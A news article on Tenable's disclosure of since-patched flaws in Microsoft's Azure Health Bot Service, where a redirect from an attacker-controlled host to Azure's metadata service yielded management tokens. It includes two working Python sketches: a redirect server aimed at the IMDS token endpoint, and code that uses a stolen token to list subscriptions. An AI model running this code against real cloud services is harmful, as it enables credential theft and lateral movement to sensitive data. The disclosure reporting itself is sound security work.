Microsoft’s AI healthcare bots might have some worrying security flaws


Microsoft’s AI-powered bots for the healthcare industry have been found to carry flaws that could have allowed threat actors to move laterally across a target’s IT infrastructure and even steal sensitive information.
Cybersecurity researchers at Tenable, who discovered the flaws and reported them to Microsoft, outlined how weaknesses in the Azure Health Bot Service enabled lateral movement throughout the network, and with it access to sensitive patient data.
The Azure AI Health Bot Service is a tool that lets developers build and deploy virtual health assistants powered by artificial intelligence (AI). With it, healthcare organizations can cut costs and improve efficiency without compromising on compliance.
Data Connections
Digital assistants of this kind routinely handle large amounts of sensitive information, which makes security and data integrity paramount.
Tenable set out to analyze how the chatbot handles these workloads and found issues in a feature called “Data Connections”, designed to pull data from other services. The researchers pointed out that the tool does have built-in safeguards that block unauthorized access to internal APIs, but they managed to bypass them by issuing redirect responses while reconfiguring a data connection to point at an external host under their control.
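The bypass described above hinges on the data connection following an HTTP redirect issued by the attacker’s server. As a minimal sketch of that technique (not Tenable’s actual tooling; the handler class name and port are illustrative), an attacker-controlled host could answer every request with a 301 pointing at Azure’s Instance Metadata Service (IMDS), which is only reachable from inside Azure:

```python
# Sketch of an attacker-controlled "data connection" endpoint that answers
# every request with a 301 redirect aimed at Azure's Instance Metadata
# Service (IMDS). The backend service, running inside Azure, follows the
# redirect to 169.254.169.254 -- an address the attacker cannot reach
# directly from outside. Class name and port are illustrative.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Documented IMDS endpoint for requesting a managed-identity OAuth token
# scoped to Azure Resource Manager.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    def do_GET(self):
        # Respond with a permanent redirect; the vulnerable service's HTTP
        # client follows it from inside the Azure network.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

# To run as the external host:
#   HTTPServer(("0.0.0.0", 8080), RedirectToIMDS).serve_forever()
```

The key design point is that the safeguard checked the attacker-supplied URL, not the destination of any redirects that URL returned, so the internal endpoint was never inspected.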
They set up the host to respond to requests with a 301 redirect aimed at Azure’s Instance Metadata Service (IMDS). That gave them a valid metadata response which, in turn, yielded an access token for management.azure.com. With the token, they were able to list all the subscriptions it granted access to.
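The post-exploitation steps above can be sketched as follows. This is an illustration under stated assumptions, not Tenable’s code: the function names are hypothetical, while the JSON shape of the IMDS token response and the Azure Resource Manager subscriptions endpoint are Azure’s documented ones.

```python
# Hedged sketch: an IMDS token response carries an OAuth access token for
# Azure Resource Manager, which can then enumerate every subscription the
# underlying managed identity can reach. Function names are illustrative.
import json
import urllib.request

ARM = "https://management.azure.com"

def token_from_imds_response(body: str) -> str:
    # IMDS returns JSON like {"access_token": "...", "expires_in": "...", ...}
    return json.loads(body)["access_token"]

def build_subscriptions_request(token: str) -> urllib.request.Request:
    # GET /subscriptions lists every subscription the token grants access to.
    return urllib.request.Request(
        f"{ARM}/subscriptions?api-version=2020-01-01",
        headers={"Authorization": f"Bearer {token}"},
    )
```

Sending that request (e.g. via `urllib.request.urlopen`) with a stolen token would return the subscription list, which is what made lateral movement into other resources possible.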
Tenable reported its findings to Microsoft a few months ago, and all regions were patched soon after. There is no evidence the flaw was exploited in the wild, the company added.
“The vulnerabilities discussed […] involve flaws in the underlying architecture of the AI chatbot service rather than the AI models themselves,” the researchers noted, adding that this “highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI powered services.”